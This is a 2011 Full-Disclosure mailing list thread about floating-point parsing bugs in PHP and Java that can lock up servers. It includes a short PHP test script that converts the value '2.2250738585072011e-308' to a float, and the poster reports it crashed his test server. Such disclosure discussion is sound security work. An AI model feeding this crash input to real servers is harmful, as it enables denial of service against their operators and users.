Ah, been reading more about it, seems it was fixed. Still, there should have been safeguards around this - I'm thinking they should check existing conversion routines to ensure they're safe...
On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras <[email protected]>wrote: > Was it fixed? What's the current status? > > The sounds like a major issue, and the lack of info about it is darn > impressive. > > > I tried it on my test Windows WAMP server: > > <?php > > ob_implicit_flush(true); > > echo 'Start test...<br/>'; > > $f=(float)"2.2250738585072011e-308"; > echo 'Try 1 => '.$f.'</br>'; > > $f=floatval("2.2250738585072011e-308"); > echo 'Try 2 => '.$f.'</br>'; > > $f="2.2250738585072011e-308"; > echo 'Try 3 => '.(float)$f.'</br>'; > > echo 'Test failed, server not vulnerable!</br>'; > > ?> > > All three tests succeeded in crashing the server. > > With all due respect, this should NOT have been disclosed without being > FIXED (as it seems to me). > Plus, I'm a bit amazed such a bug exists in PHP - since converting to > floating point is a trivial operation, it should have been limited and > safe-guarded from the start. > There are a lot of servers out there happily accepting input as floating > point values, this bug should be top priority... > > > Chris. > > > > On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser <[email protected]> wrote: > >> >> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers >> >> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server<http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Servers> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
